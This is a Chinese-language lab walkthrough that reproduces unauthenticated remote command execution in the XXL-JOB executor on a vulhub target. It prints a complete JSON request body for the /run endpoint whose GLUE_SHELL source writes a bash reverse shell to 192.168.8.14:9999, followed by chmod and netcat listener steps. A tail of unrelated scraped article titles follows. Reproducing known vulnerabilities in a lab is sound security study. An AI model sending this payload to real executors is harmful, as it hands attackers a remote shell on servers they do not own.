目录

  • 1、漏洞描述
  • 2、靶场搭建
  • 3、漏洞复现(反弹shell)

1、漏洞描述

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

2、靶场搭建

靶场使用vulhub
进入vulhub/xxl-job/unacc目录下,执行docker-compose up -d

容器起来后,docker ps -a看一下

浏览器访问http://your-ip:9999

看到如上图,说明漏洞环境部署成功。

3、漏洞复现(反弹shell)

浏览器访问http://your-ip:9999/run,并通过bp抓包

修改请求方式为POST ,并写入exp,然后发送请求

exp:

{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0
}


将/tmp/1.sh赋予可执行权限

开启nc监听

执行命令:

查看nc监听,反弹成功

xxl-job远程命令执行漏洞复现相关推荐

  1. PHPMailer远程命令执行漏洞复现

    ​PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...

  2. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  3. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  4. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

  5. Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现

    目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞

  6. HFS远程命令执行漏洞复现

    漏洞程序下载地址:Http File Server 这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题.再Window ...

  7. thinkphp5.*远程命令执行漏洞复现

    ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...

  8. O2OA RCE 远程命令执行漏洞复现(CVE-2022-22916)

    1.产品简介 O2OA是一款Java开源企业信息化建设平台 ,包括流程管理.门户管理.信息管理.数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度. 2.漏洞概述 O2 ...

  9. Google 0day远程命令执行漏洞复现

    目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...

  10. Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)

    漏洞描述 Solr是Apache Lucene项目的开源企业搜索平台. 其主要功能包括全文检索.命中标示.分面搜索.动态聚类.数据库集成,以及富文本的处理. 2019年10月30日,国外安全研究人员放 ...

最新文章

  1. checkpoint是什么?
  2. Swift JSON转模型Xcode插件
  3. openmp官方源码_MNN推理过程源码分析笔记(一)主流程
  4. 以application/json 方式提交 然后用在php中读取原始数据流的方式获取 在json_encode...
  5. rabbitmq的启动命令和springboot整合使用rabbitmq
  6. pppoe拨号的外网ip无法ping通_【思唯网络学院】 五大网络概念:IP地址、子网掩码、网关、DHCP服务和PPPoE拨号...
  7. linux svn 拉取代码_svn快速入门指南
  8. 基于微信校园二手书交易小程序系统 毕业设计毕设参考
  9. 蓝桥杯:合唱队形(C语言)
  10. c++ RMI demo(使用RCF库)
  11. RK3399 focaltech敦泰触摸屏移植调试
  12. c语言结构体世界杯,世界杯冷知识 | 12座球场的结构巡礼
  13. linux中断数据结构图,北桥.PCI.linuxPCI中断处理
  14. 打造地图拼接利器(六)GMap.net内动态显示和更新经纬网络
  15. 用“人话”解释不精确线搜索中的Armijo-Goldstein准则及Wolfe-Powell准则
  16. MCE| 熬夜导致DNA损伤、致癌
  17. Javascript万年历
  18. “元宇宙”,究竟离我们有多远?(下)
  19. SpringBoot 必知必会的19个常用注解
  20. 科研中提高效率的软件网站

热门文章

  1. 传奇私服游戏支付接口申请(已解决)
  2. 我把1688当兼职副业,月入5W
  3. 24张神GIF动图:数学概念这么酷!
  4. 【搞定Java并发编程】第24篇:Java中的并发工具类之CountDownLatch
  5. Power Apps Android APK(v3.22081.11)下载
  6. 数据分析项目-某加油站订单分析(SQL需求篇)
  7. Python中调用FRED报错ValueError: time data 'fred' does not match format '%Y-%m-%d'
  8. 刷脸已经逐步在多个领域落地开花
  9. Coursera | Grammer and Punctuation(UCI) | Quiz
  10. 如何引爆手淘首页流量,手淘首页流量获取玩法